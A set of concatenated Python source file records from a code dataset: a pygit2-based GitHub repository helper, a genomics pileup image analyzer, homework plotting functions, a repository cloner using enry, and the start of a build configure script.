Please try again later.\",\n \"documentation_url\": \"https://developer.github.com/v3\"\n }\n\n Args:\n response (requests.models.Response): The Response from the github server\n\n Returns:\n valid_credentials (bool): True if access was successful, false otherwise\n\n \"\"\"\n\n # Assume invalid credentials unless proved otherwise\n shaker.libs.logger.Logger().debug(\"github::validate_github_access:starts here:response: %s\"\n % str(response))\n\n if (type(response) == requests.models.Response):\n\n # Check the status codes for success\n if response.status_code == 200:\n shaker.libs.logger.Logger().debug(\"github::validate_github_access:Github access checked ok\")\n return True\n else:\n # Set a default response message, use the real one if we\n # find it in the response\n response_message = \"No response found\"\n try:\n # Access the responses body as json\n response_json = json.loads(response.text)\n\n if \"message\" in response_json:\n response_message = response_json[\"message\"]\n shaker.libs.logger.Logger().debug(\"Github credentials test got response: %s\"\n % response_json)\n except:\n # Just ignore if we can'l load json, its not essential here\n if (response.status_code == 401) and (\"Bad credentials\" in response_message):\n shaker.libs.logger.Logger().error(\"validate_github_access: \"\n \"Github credentials incorrect: %s\" % response_message)\n elif response.status_code == 403 and (\"Maximum number of login attempts exceeded\" in response_message):\n shaker.libs.logger.Logger().error(\"validate_github_access: \"\n \"Github credentials failed due to lockout: %s\" % response_message)\n elif response.status_code == 404:\n shaker.libs.logger.Logger().debug(\"github::validate_github_access: \"\n \"URL %s not found\" % url)\n else:\n shaker.libs.logger.Logger().warning(\"validate_github_access: \"\n \"Unknown problem checking credentials: %s\" % response)\n else:\n shaker.libs.logger.Logger().error(\"Invalid response: %s\" % response)\n\n return False\n\n\ndef open_repository(url,\n target_directory):\n \"\"\"\n Make a connection from a remote git repository into a local\n directory.\n\n Args:\n url(string): The remote github url of the repository\n target_directory(string): The local target directory\n\n Returns:\n pygit2.repo: The repository object created\n \"\"\"\n git_url = urlparse.urlparse(url)\n username = git_url.netloc.split('@')[0]\\\n if '@' in git_url.netloc else 'git'\n try:\n credentials = pygit2.credentials.KeypairFromAgent(username)\n except AttributeError as e:\n pygit2_parse_error(e)\n\n # If local directory exists, then make a connection to it\n # Otherwise, clone the remote repo into the new directory\n if os.path.isdir(target_directory):\n shaker.libs.logger.Logger().debug(\"open_repository: \"\n \"Opening url '%s' \"\n \"with existing local repository '%s'\"\n % (url, target_directory))\n repo = pygit2.Repository(target_directory)\n else:\n # Try to use pygit2 0.22 cloning\n try:\n shaker.libs.logger.Logger().debug(\"open_repository: \"\n \"Trying to open repository \"\n \"using pygit2 0.22 format\")\n repo = pygit2.clone_repository(url,\n target_directory,\n credentials=credentials)\n except TypeError as e:\n shaker.libs.logger.Logger().debug(\"open_repository: \"\n \"Failed to detect pygit2 0.22\")\n shaker.libs.logger.Logger().debug(\"open_repository: \"\n \"Trying to open repository \"\n \"using pygit2 0.23 format\")\n # Try to use pygit2 0.23 cloning\n callbacks = pygit2.RemoteCallbacks(credentials)\n repo = pygit2.clone_repository(url,\n 
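validate_github_access boils down to the status-code triage its docstring describes. A condensed version of that check against a stub response object (the stub is illustrative; any object with a status_code attribute works):

```python
class FakeResponse(object):
    def __init__(self, status_code):
        self.status_code = status_code

def check_github_response(response):
    """Condensed version of validate_github_access above: True on 200,
    a printed diagnosis for the 401/403 cases it documents."""
    if response.status_code == 200:
        return True
    if response.status_code == 401:
        print('Bad credentials - check your GITHUB_TOKEN')
    elif response.status_code == 403:
        print('Login attempts exceeded or rate limited - try again later')
    return False

assert check_github_response(FakeResponse(200))
assert not check_github_response(FakeResponse(401))
```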
target_directory,\n callbacks=callbacks)\n\n shaker.libs.logger.Logger().debug(\":open_repository: \"\n \"Cloning url '%s' into local repository '%s'\"\n % (url, target_directory))\n origin = filter(lambda x: x.name == 'origin', repo.remotes)\n if not origin:\n repo.create_remote('origin', url)\n origin = filter(lambda x: x.name == 'origin', repo.remotes)\n origin[0].credentials = credentials\n\n return repo\n\n\ndef install_source(target_source,\n target_directory,\n use_tag=False):\n \"\"\"\n Install the requirement as specified by the formula dictionary and\n return the directory symlinked into the roots_dir. The sha revision\n will be checked out if specified, and if not, then the tag will be\n checked out if present\n\n Args:\n target_source(dictionary): A keyed collection of information about the\n source of the format\n {\n 'name': '',\n 'url': '',\n 'sha': ,\n 'tag': ,\n }\n target_directory(string): THe directory to install into\n use_tag(bool): True to use the tag value for versioning,\n False otherwise\n \"\"\"\n shaker.libs.logger.Logger().debug(\"install_source(%s, %s, %s)\"\n % (target_source,\n target_directory,\n use_tag))\n target_name = target_source.get('name', None)\n target_url = target_source.get('source', None)\n target_sha = target_source.get('sha', None)\n target_tag = target_source.get('tag', None)\n\n target_path = os.path.join(target_directory,\n target_name)\n shaker.libs.logger.Logger().debug(\"install_source: Opening %s in directory %s, \"\n \"with url %s, sha %s, tag %s\"\n % (target_name,\n target_directory,\n target_url,\n target_sha,\n target_tag))\n target_repository = open_repository(target_url, target_path)\n\n if use_tag:\n if target_tag is None:\n shaker.libs.logger.Logger().error(\"github::install_source: Tag usage specified but is empty\")\n return False\n # Look for tag, if not then look for branch\n try:\n parsed_tag = target_repository.revparse_single(target_tag)\n\n # If parsed tag refs a tag object, look for the actual commit object\n if parsed_tag.type == pygit2.GIT_OBJ_TAG:\n target_sha = parsed_tag.peel(pygit2.GIT_OBJ_COMMIT).hex\n else:\n target_sha = parsed_tag.hex\n\n shaker.libs.logger.Logger().debug(\"github::install_source: Found tag sha '%s' for tag '%s'\"\n % (target_sha, target_tag))\n except KeyError:\n # Try to find the branch\n branch = target_repository.lookup_branch((\"origin/%s\" % target_tag),\n pygit2.GIT_BRANCH_REMOTE)\n\n if branch is not None:\n target_repository.checkout(branch)\n parsed_tag = target_repository.revparse_single('HEAD')\n target_sha = parsed_tag.hex\n else:\n shaker.libs.logger.Logger().debug(\"github::install_source: \"\n \"Could not find branch '%s', '%s'\"\n % (target_tag, branch))\n # We couldnt resolve this tag\n shaker.libs.logger.Logger().error(\"github::install_source: Could not find tag or branch %s\"\n % (target_tag))\n return False\n # Use the sha target if it exists, otherwise try the tag value\n else:\n if target_sha is None:\n shaker.libs.logger.Logger().error(\"github::install_source: Raw sha usage specified but is empty\")\n return False\n\n current_sha = get_repository_sha(target_path,\n revision='HEAD')\n # If the local and target shas are the same, skip\n # otherwise, update the repository\n if current_sha == target_sha:\n shaker.libs.logger.Logger().debug(\"github::install_source: %s: \"\n \"Target and current shas are equivalent...\"\n \"skipping update: %s\"\n % (target_path,\n target_sha))\n return True\n else:\n shaker.libs.logger.Logger().debug(\"github::install_source: Found raw 
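open_repository above probes for the pygit2 0.22 clone signature by catching the TypeError that the 0.23 API raises for the old keyword. That try/except feature-detection pattern is worth isolating; the two stand-in clone functions below only mimic the old and new signatures and are not pygit2's real API:

```python
def clone_v22(url, path, credentials=None):   # stand-in for the old signature
    return ('v22', url, path, credentials)

def clone_v23(url, path, callbacks=None):     # stand-in for the new signature
    return ('v23', url, path, callbacks)

def open_with_fallback(clone, url, path, creds):
    """The probe open_repository uses: attempt the pygit2 0.22 keyword
    first; a TypeError means we are on the newer API."""
    try:
        return clone(url, path, credentials=creds)
    except TypeError:
        return clone(url, path, callbacks=creds)

assert open_with_fallback(clone_v22, 'u', 'p', 'c')[0] == 'v22'
assert open_with_fallback(clone_v23, 'u', 'p', 'c')[0] == 'v23'
```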
sha '%s'\"\n % (target_sha))\n\n # We should have a sha now, use it to setup the repos\n target_oid = pygit2.Oid(hex=target_sha)\n\n target_repository.checkout_tree(target_repository[target_oid].tree)\n shaker.libs.logger.Logger().debug(\"github::install_source: Checking out oid '%s' in '%s\"\n % (target_oid, target_path))\n # The line below is *NOT* just setting a value.\n # Pygit2 internally resets the head of the filesystem to the OID we set.\n target_repository.set_head(target_oid)\n\n if target_repository.head.get_object().hex != target_sha:\n shaker.libs.logger.Logger().debug(\"Resetting sha mismatch on source '%s'\"\n % (target_name))\n target_repository.reset(target_sha, pygit2.GIT_RESET_HARD)\n\n shaker.libs.logger.Logger().debug(\"Source '%s' is at version '%s'\"\n % (target_name, target_sha))\n return True\n\n\ndef get_origin_for_remote(repository):\n \"\"\"\n Find the origin of a remote repository\n\n Args:\n repository(pygit2.repository):\n The remote repository to search\n\n Returns:\n pygit2.remote: The remote origin, None type\n if it couldn't be found\n \"\"\"\n for remote in repository.remotes:\n if remote.name == 'origin':\n url_bits = urlparse.urlparse(remote.url)\n if url_bits.scheme == 'git':\n remote.url = 'ssh://{0}{1}'.format(url_bits.netloc,\n url_bits.path)\n remote.save()\n return remote\n\n return None\n\n\ndef get_repository_sha(path,\n revision='HEAD'):\n \"\"\"\n Get the sha from a repository path and revision\n\n Args:\n path(string): The path to the repository to open\n revision(string): the revision to get the sha of\n\n Returns:\n string: The sha of the revision, None type if\n not found\n \"\"\"\n try:\n repository = pygit2.Repository(path)\n sha = repository.revparse_single(revision).oid\n return sha.__str__()\n except KeyError as e:\n shaker.libs.logger.Logger().debug(\"github::get_repository_sha: \"\n \"Error opening repository: %s\"\n % (e))\n return None\n","sub_path":"shaker/libs/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":40042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"596276179","text":"import os\nimport argparse\nfrom PIL import Image, ImageOps\nimport numpy as np\nimport math\n\n\ndef get_base_by_color(base):\n \"\"\"\n Get color based on a base.\n - Uses different band of the same channel.\n :param base:\n :return:\n \"\"\"\n if base >= 250.0:\n return 'A'\n if base >= 180.0:\n return 'G'\n if base >= 100.0:\n return 'C'\n if base >= 30.0:\n return 'T'\n if base >= 5.0:\n return '*'\n\n\ndef get_alt_support_by_color(is_in_support):\n \"\"\"\n ***NOT USED YET***\n :param is_in_support:\n :return:\n \"\"\"\n if is_in_support == 254.0:\n return 1\n elif is_in_support == 152.0:\n return 0\n\n\ndef get_quality_by_color(map_quality):\n \"\"\"\n Get a color spectrum given mapping quality\n :param map_quality: value of mapping quality\n :return:\n \"\"\"\n color = math.floor(((map_quality / 254) * 9))\n return color\n\ndef get_match_ref_color(is_match):\n \"\"\"\n Get color for base matching to reference\n :param is_match: If true, base matches to reference\n :return:\n \"\"\"\n if is_match == 50:\n return 1\n elif is_match == 254:\n return 0\n\n\ndef get_strand_color(is_rev):\n \"\"\"\n Get color for forward and reverse reads\n :param is_rev: True if read is reversed\n :return:\n \"\"\"\n if is_rev == 240.0:\n return 1\n else:\n return 0\n\n\ndef get_cigar_by_color(cigar_code):\n \"\"\"\n ***NOT USED YET***\n :param is_in_support:\n :return:\n \"\"\"\n if 
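get_base_by_color above decodes a base by thresholding one channel into value bands. With numpy the same banded lookup applies to a whole channel at once; a sketch reusing the script's thresholds, assuming the same >= boundary semantics:

```python
import numpy as np

# Same thresholds as get_base_by_color, applied to a whole 2-D channel.
EDGES = np.array([5.0, 30.0, 100.0, 180.0, 250.0])
LABELS = np.array([' ', '*', 'T', 'C', 'G', 'A'])  # below 5.0 -> blank

def decode_base_channel(channel):
    """Map every pixel in a 2-D channel to its base letter."""
    return LABELS[np.digitize(channel, EDGES)]

channel = np.array([[254.0, 0.0], [101.0, 40.0]])
print(decode_base_channel(channel))  # [['A' ' '] ['C' 'T']]
```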
cigar_code == 254:\n return 0\n if cigar_code == 152:\n return 1\n if cigar_code == 76:\n return 2\n\n\ndef analyze_it(img):\n file = img\n img = Image.open(file)\n\n shape = (300, 300, 7)\n np_array_of_img = np.array(img.getdata())\n\n img = np.reshape(np_array_of_img, shape)\n img = np.transpose(img, (0, 1, 2))\n print(\"BASE CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][0] != 0:\n print(get_base_by_color(img[i][j][0]), end='')\n else:\n print(' ',end='')\n print()\n print(\"CIGAR CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][6] != 0:\n print(get_cigar_by_color(img[i][j][6]), end='')\n else:\n print(' ', end='')\n print()\n print(\"SUPPORT CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][5] != 0:\n print(get_alt_support_by_color(img[i][j][5]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"BASE QULAITY CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][1] != 0:\n print(get_quality_by_color(img[i][j][1]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"MAP QUALITY CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][2] != 0:\n print(get_quality_by_color(img[i][j][2]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"MISMATCH CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][4] != 0:\n print(get_match_ref_color(img[i][j][4]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"STRAND CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[i][j][3] != 0:\n print(get_strand_color(img[i][j][3]), end='')\n else:\n print(' ', end='')\n print()\n\n\ndef analyze_np_array(img):\n img = img.numpy() * 255\n # img = np.reshape(np_array_of_img, shape)\n # img = np.transpose(img, (0, 1, 2))\n print(\"BASE CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[0][i][j] != 0:\n print(get_base_by_color(img[0][i][j]), end='')\n else:\n print(' ',end='')\n print()\n\n print(\"CIGAR CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[6][i][j] != 0:\n print(get_cigar_by_color(img[6][i][j]), end='')\n else:\n print(' ', end='')\n print()\n print(\"SUPPORT CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[5][i][j] != 0:\n print(get_alt_support_by_color(img[5][i][j]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"BASE QULAITY CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[1][i][j] != 0:\n print(get_quality_by_color(img[1][i][j]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"MAP QUALITY CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[2][i][j] != 0:\n print(get_quality_by_color(img[2][i][j]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"MISMATCH CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[4][i][j] != 0:\n print(get_match_ref_color(img[4][i][j]), end='')\n else:\n print(' ', end='')\n print()\n\n print(\"STRAND CHANNEL\")\n for i in range(300):\n for j in range(300):\n if img[3][i][j] != 0:\n print(get_strand_color(img[3][i][j]), end='')\n else:\n print(' ', end='')\n print()\n\nif __name__ == '__main__':\n \"\"\"\n Processes arguments and performs tasks to generate the pileup.\n \"\"\"\n\n parser = argparse.ArgumentParser()\n parser.register(\"type\", \"bool\", lambda v: v.lower() == \"true\")\n parser.add_argument(\n \"--img\",\n type=str,\n required=True,\n help=\"Path to the image.\"\n )\n FLAGS, not_parsed_flags = parser.parse_known_args()\n # make output directory if not already 
created\n analyze_it(FLAGS.img)","sub_path":"image_analyzer.py","file_name":"image_analyzer.py","file_ext":"py","file_size_in_byte":5984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"403761762","text":"\"\"\"plot and visualization functions for cs131 hw7\"\"\"\nimport matplotlib.patches as patches\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom skimage.transform import downscale_local_mean, rescale, resize\n\n\ndef plot_part1(avg_face, face_hog):\n \"\"\"plot average face and hog representatitons of face.\"\"\"\n plt.subplot(1, 2, 1)\n plt.imshow(avg_face)\n plt.axis('off')\n plt.title('average face image')\n\n plt.subplot(1, 2, 2)\n plt.imshow(face_hog)\n plt.title('hog representation of face')\n plt.axis('off')\n\n plt.show()\n\n\ndef plot_part2(image, r, c, response_map_resized, response_map, winW, winH):\n \"\"\"plot window with highest hog score and heatmap.\"\"\"\n fig, (ax1, ax2, ax3) = plt.subplots(3, figsize=(10,15))\n\n im = ax1.imshow(image)\n rect = patches.Rectangle((c - winW // 2, r - winH // 2),\n winW,\n winH,\n linewidth=1,\n edgecolor='r',\n facecolor='none')\n ax1.add_patch(rect)\n fig.colorbar(im, ax=ax1)\n\n ax2.set_title('Sliding Window Response Map')\n im = ax2.imshow(response_map_resized, cmap='viridis', interpolation='nearest')\n fig.colorbar(im, ax=ax2)\n\n ax3.set_title('Unresized Sliding Window Response Map')\n im = ax3.imshow(response_map, cmap='viridis', interpolation='nearest')\n fig.colorbar(im, ax=ax3)\n plt.tight_layout()\n plt.show()\n\n\ndef plot_part3_1(images):\n \"\"\"plot image pyramid.\"\"\"\n sum_r = 0\n sum_c = 0\n for i, result in enumerate(images):\n (scale, image) = result\n if i == 0:\n sum_c = image.shape[1]\n sum_r += image.shape[0]\n\n composite_image = np.zeros((sum_r, sum_c))\n\n pointer = 0\n for i, result in enumerate(images):\n (scale, image) = result\n composite_image[pointer:pointer +\n image.shape[0], :image.shape[1]] = image\n pointer += image.shape[0]\n\n plt.imshow(composite_image)\n plt.axis('off')\n plt.title('Image Pyramid')\n plt.show()\n\n\ndef plot_part3_2(image, max_scale, winW, winH, maxc, maxr, max_response_map):\n \"\"\"plot window with highest hog score and heatmap.\"\"\"\n fig, (ax1, ax2) = plt.subplots(2, figsize=(10,10))\n im = ax1.imshow(rescale(image, max_scale))\n rect = patches.Rectangle((maxc - winW // 2, maxr - winH // 2),\n winW,\n winH,\n linewidth=1,\n edgecolor='r',\n facecolor='none')\n ax1.add_patch(rect)\n fig.colorbar(im, ax=ax1)\n\n ax2.set_title('Pyramid Score Response Map')\n im = ax2.imshow(max_response_map, cmap='viridis', interpolation='nearest')\n fig.colorbar(im, ax=ax2)\n plt.tight_layout()\n plt.show()\n\n\ndef plot_part4(avg, hog, part_name):\n \"\"\"plot average and hog representatitons of deformable parts.\"\"\"\n plt.subplot(1, 3, 1)\n plt.imshow(avg)\n plt.axis('off')\n plt.title('average ' + part_name + ' image')\n\n plt.subplot(1, 3, 2)\n plt.imshow(hog)\n plt.axis('off')\n plt.title('average hog image')\n plt.show()\n\n\ndef plot_part5_1(response_map):\n \"\"\"plot heatmaps.\"\"\"\n fig, ax = plt.subplots(1, figsize=(10,5))\n im = ax.imshow(response_map, cmap='viridis', interpolation='nearest')\n fig.colorbar(im, ax=ax)\n plt.show()\n\n\ndef plot_part5_2_face(face_heatmap_shifted):\n \"\"\"plot heatmaps.\"\"\"\n fig, ax = plt.subplots(1, figsize=(10,5))\n im = ax.imshow(face_heatmap_shifted, cmap='viridis', interpolation='nearest')\n fig.colorbar(im, ax=ax)\n plt.show()\n\n\ndef 
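Nearly every helper in the visualization module repeats the same two moves: imshow a response map with a colorbar, then outline the winning window with a Rectangle patch. A minimal standalone version of that pattern:

```python
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import numpy as np

def show_response_map(response_map, r, c, win_h, win_w):
    """imshow + colorbar + best-window rectangle, the pattern used by
    plot_part2 and plot_part6_1 above."""
    fig, ax = plt.subplots(figsize=(6, 6))
    im = ax.imshow(response_map, cmap='viridis', interpolation='nearest')
    ax.add_patch(patches.Rectangle((c - win_w // 2, r - win_h // 2),
                                   win_w, win_h,
                                   linewidth=1, edgecolor='r', facecolor='none'))
    fig.colorbar(im, ax=ax)
    plt.show()

# show_response_map(np.random.rand(50, 50), r=20, c=30, win_h=10, win_w=8)
```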
plot_part5_2_parts(lefteye_heatmap_shifted, righteye_heatmap_shifted,\n nose_heatmap_shifted, mouth_heatmap_shifted):\n \"\"\"plot heatmaps.\"\"\"\n f, axarr = plt.subplots(2, 2, figsize=(14,7))\n\n im = axarr[0, 0].imshow(\n lefteye_heatmap_shifted, cmap='viridis', interpolation='nearest')\n f.colorbar(im, ax=axarr[0,0])\n\n im = axarr[0, 1].imshow(\n righteye_heatmap_shifted, cmap='viridis', interpolation='nearest')\n f.colorbar(im, ax=axarr[0,1])\n\n im = axarr[1, 0].imshow(\n nose_heatmap_shifted, cmap='viridis', interpolation='nearest')\n f.colorbar(im, ax=axarr[1,0])\n\n im = axarr[1, 1].imshow(\n mouth_heatmap_shifted, cmap='viridis', interpolation='nearest')\n f.colorbar(im, ax=axarr[1,1])\n\n plt.show()\n\n\ndef plot_part6_1(winH, winW, heatmap, image, i, j):\n \"\"\"plot heatmaps and optimal window.\"\"\"\n fig, (ax1, ax2) = plt.subplots(2, figsize=(10,10))\n im = ax1.imshow(resize(image, heatmap.shape))\n rect = patches.Rectangle((j - winW // 2, i - winH // 2),\n winW,\n winH,\n linewidth=1,\n edgecolor='r',\n facecolor='none')\n ax1.add_patch(rect)\n fig.colorbar(im, ax=ax1)\n\n ax2.set_title('Gaussian Filter Heatmap')\n im = ax2.imshow(heatmap, cmap='viridis', interpolation='nearest')\n rect = patches.Rectangle((j - winW // 2, i - winH // 2),\n winW,\n winH,\n linewidth=1,\n edgecolor='r',\n facecolor='none')\n ax2.add_patch(rect)\n fig.colorbar(im, ax=ax2)\n plt.tight_layout()\n plt.show()\n","sub_path":"fall_2020/hw6_release/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":5403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"79004689","text":"from functools import partial\nimport json\nimport logging\nfrom multiprocessing.dummy import Pool\nimport os\nimport shutil\nimport subprocess\n\n\nclass LinguistFailedError(Exception):\n \"\"\"\n Raised when we fail to classify the source files.\n \"\"\"\n pass\n\n\nclass RepoCloner:\n \"\"\"\n Clones repositories from provided urls / files with urls.\n Use enry to classify files and delete redundant files if needed.\n \"\"\"\n def __init__(self, redownload, linguist=None, languages=None,\n log_level=logging.INFO, num_threads=1):\n self._log = logging.getLogger(\"repo_cloner\")\n self._log.setLevel(log_level)\n self._is_enry = False\n self._languages = languages\n self._linguist = None\n self._num_threads = num_threads\n self._redownload = redownload\n if linguist or languages:\n self.find_linguist(linguist)\n\n def clone_repo(self, git_url, ignore, target_dir):\n \"\"\"\n Clones repository into a separate directory inside of the target one.\n\n :param git_url: Url of Git repository.\n :param ignore: Flag for ignoring Git failures.\n :param target_dir: Target directory. New directory will be created inside of target_dir.\n :return: Path to downloaded Git repository.\n \"\"\"\n git_url = self._prepare_repo_url(git_url)\n\n try:\n repo_dir = self._prepare_repo_dir(git_url, target_dir)\n except FileExistsError as e:\n self._log.warning(\"%s already cloned, skipping.\", git_url)\n return\n\n env = os.environ.copy()\n env[\"GIT_TERMINAL_PROMPT\"] = \"0\" # force Git not to ask anything\n self._log.info(\"Cloning from %s...\", git_url)\n\n try:\n subprocess.check_output([\"git\", \"clone\", \"--depth=1\", git_url, repo_dir],\n env=env, stdin=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError as e:\n shutil.rmtree(repo_dir, ignore_errors=True)\n self._log.error(\"Git failed to clone repo. 
git stderr:\\n\\t\" +\n \"\\n\\t\".join(e.output.decode(\"utf8\").split(\"\\n\")))\n if not ignore:\n raise e from None\n else:\n return\n except Exception as e:\n shutil.rmtree(repo_dir, ignore_errors=True)\n self._log.error(\"Unknown error in RepoCloner. Git failed to clone repo.\")\n raise e from None\n\n self._log.info(\"Finished cloning %s\", git_url)\n return repo_dir\n\n def classify_repo(self, repo_dir: str) -> dict:\n \"\"\"\n Classify files in a repository using provided linguist.\n\n :param repo_dir: Path to repository directory.\n :return: linguist output loaded from JSON.\n \"\"\"\n if not self._linguist:\n raise LinguistFailedError(\"Linguist is not set - cannot classify the files\")\n\n self._log.info(\"Classifying the files...\")\n repo_dir = os.path.abspath(repo_dir)\n cmdline = [self._linguist]\n if self._is_enry:\n cmdline += [\"-json\", repo_dir]\n else:\n cmdline += [repo_dir, \"--json\"]\n try:\n bjson = subprocess.check_output(cmdline)\n except subprocess.CalledProcessError:\n self._log.error(\"Couldn't classify files in %s\", repo_dir)\n raise LinguistFailedError() from None\n classified = json.loads(bjson.decode(\"utf8\"))\n self._log.info(\"Result: %s\", {k: len(v) for k, v in classified.items()})\n return classified\n\n def cleanup_repo(self, classified: dict, repo_dir: str) -> None:\n \"\"\"\n Delete files not classified by linguist (if some languages were specified then only them\n are preserved).\n\n :param classified: enry output loaded from JSON.\n :param repo_dir: Path to repository directory.\n :return:\n \"\"\"\n if self._languages:\n self._log.info(\"Removing files with languages not in (%s)\",\n \",\".join(self._languages))\n languages = self._languages\n else:\n self._log.info(\"Removing files not classified by enry.\")\n languages = classified.keys()\n\n allowed_files = set(str.encode(os.path.join(repo_dir, fname)) for lang in languages\n if lang in classified for fname in classified[lang])\n\n for root, dirnames, filenames in os.walk(str.encode(repo_dir), topdown=False):\n for filename in filenames:\n full_filename = os.path.join(root, filename)\n if full_filename not in allowed_files:\n os.remove(full_filename)\n for dirname in dirnames:\n full_dirname = os.path.join(root, dirname)\n if os.path.islink(full_dirname):\n os.unlink(full_dirname)\n elif not os.listdir(full_dirname):\n os.rmdir(full_dirname)\n\n def clone_repos(self, inputs, output, ignore):\n with Pool(self._num_threads) as pool:\n pool.map(partial(self.process_repo, ignore=ignore, target_dir=output),\n self.generate_repo_urls(inputs))\n\n def process_repo(self, git_url: str, ignore: bool, target_dir: str) -> None:\n repo_dir = self.clone_repo(git_url, ignore, target_dir)\n if repo_dir is None or self._linguist is None:\n return\n classified = self.classify_repo(repo_dir)\n if classified:\n self.cleanup_repo(classified, repo_dir)\n\n @staticmethod\n def generate_repo_urls(inputs):\n \"\"\"\n Parse provided inputs.\n\n :param inputs: List of files and/or Git urls.\n :return: Generator of git urls.\n \"\"\"\n for item in inputs:\n if os.path.isfile(item):\n with open(item, encoding=\"utf8\") as f:\n for line in f:\n yield line.rstrip()\n else:\n yield item\n\n def find_linguist(self, linguist):\n if linguist is None:\n linguist = shutil.which(\"enry\", path=os.getcwd() + \":\" + os.getenv(\"PATH\", os.defpath))\n full_path = shutil.which(linguist)\n if not full_path:\n raise FileNotFoundError(\"%s was not found. 
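clone_repos fans the work out over a thread pool (multiprocessing.dummy) with functools.partial binding the fixed arguments, which suits I/O-bound git clones. The skeleton, with a print stub where process_repo would do the cloning:

```python
from functools import partial
from multiprocessing.dummy import Pool  # thread pool; fine for I/O-bound clones

def process(url, target_dir):
    print('would clone %s into %s' % (url, target_dir))

def clone_all(urls, target_dir, num_threads=4):
    """Same fan-out as RepoCloner.clone_repos: bind the fixed argument
    with partial, then map over the url iterable."""
    with Pool(num_threads) as pool:
        pool.map(partial(process, target_dir=target_dir), urls)

clone_all(['https://github.com/a/b', 'https://github.com/c/d'], '/tmp/repos', 2)
```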
Install it: python3 -m ast2vec enry\" %\n linguist)\n self._linguist = linguist\n with open(full_path, \"rb\") as fin:\n # Check if we're using https://github.com/github/linguist\n self._is_enry = fin.read(15) != b\"#!/usr/bin/ruby\"\n\n def _prepare_repo_dir(self, git_url: str, target_dir: str) -> str:\n \"\"\"\n Prepare directory for saving Git repository, i.e. create / cleanup if necessary.\n\n :param git_url: Url of Git repository.\n :param target_dir: Parent directory for Git repository.\n :return: Path to prepared directory.\n \"\"\"\n git_ending = \".git\"\n repo_name = \"&\".join(git_url.rsplit(\"/\", maxsplit=2)[-2:])\n if repo_name.endswith(git_ending):\n repo_name = repo_name[:-len(git_ending)]\n site_start = git_url.find(\"//\")\n site_end = git_url.find(\"/\", site_start + 2)\n repo_name += \"_\" + git_url[site_start + 2:site_end]\n repo_dir = os.path.join(target_dir, repo_name)\n\n if os.path.exists(repo_dir) and self._redownload:\n self._log.info(\"%s already downloaded to %s, will download it again\",\n git_url, repo_dir)\n shutil.rmtree(repo_dir)\n\n os.makedirs(repo_dir)\n return repo_dir\n\n @staticmethod\n def _prepare_repo_url(git_url: str) -> str:\n \"\"\"\n Prepare name of repository for operations with git.\n Remove '\\n', '/' and '\\' in the end of string.\n Add 'https://' in the beginning if necessary.\n\n :param reponame: Raw Git url of repository.\n :return: Clean Git url.\n \"\"\"\n bad_endings = \"\\n\\r\\\\/\"\n git_url = git_url.rstrip(bad_endings)\n if not git_url.startswith(\"git://\") and not git_url.startswith(\"https://\") and \\\n not git_url.startswith(\"http://\"):\n git_url = \"https://\" + git_url\n return git_url\n\n\ndef clone_repositories(args):\n \"\"\"\n Invokes RepoCloner(\\*\\*args).clone_repos() on the specified input.\n\n :param args: :class:`argparse.Namespace` with \"input\", \"output\" and \"ignore\". \"input\" is a \\\n list of files and/or Git urls. \"output\" is the path to directory for storing \\\n all repositories. 
\"ignore\" is a flag for specifying to ignore Git clone problems.\n :return: None\n \"\"\"\n clone_args = _sanitize_kwargs(args)\n RepoCloner(**clone_args).clone_repos(args.input, args.output, args.ignore)\n\n\ndef _sanitize_kwargs(args):\n clone_args = getattr(args, \"__dict__\", args).copy()\n blacklist = (\"command\", \"ignore\", \"input\", \"handler\", \"output\")\n for arg in blacklist:\n clone_args.pop(arg, None)\n clone_args[\"num_threads\"] = clone_args.pop(\"threads\")\n return clone_args\n","sub_path":"ast2vec/cloning.py","file_name":"cloning.py","file_ext":"py","file_size_in_byte":9095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"555677699","text":"import argparse\nimport os\nimport subprocess\nimport sys\n\nfrom configure import checks\nfrom configure.gen import native, asmjs, data, js, dist, scripts\nfrom configure.template import template\n\n\ndef build_parser():\n args = argparse.ArgumentParser()\n\n args.add_argument('--build-dir', default=None,\n help='directory to store build files')\n args.add_argument('--dist-dir', default=None,\n help='directory to store distribution image')\n\n args.add_argument('--data-only', action='store_true', default=False,\n help='generate data files only; don\\'t compile any code')\n args.add_argument('--use-prebuilt',\n help='use prebuild versions of the named files/directories')\n args.add_argument('--prebuilt-dir', default=None,\n help='directory containing a previously compiled version')\n args.add_argument('--reconfigure', action='store_true', default=False,\n help='reuse cached configuration info when possible')\n args.add_argument('--mods',\n help='list of mods to include in the compiled game')\n\n args.add_argument('--debug', action='store_true', default=False,\n help='produce a debug build')\n args.add_argument('--release', action='store_false', dest='debug',\n help='produce a release build (default)')\n\n args.add_argument('--rust-home', default='../rust',\n help='path to rust-lang/rust checkout')\n args.add_argument('--bitflags-home', default='../bitflags',\n help='path to 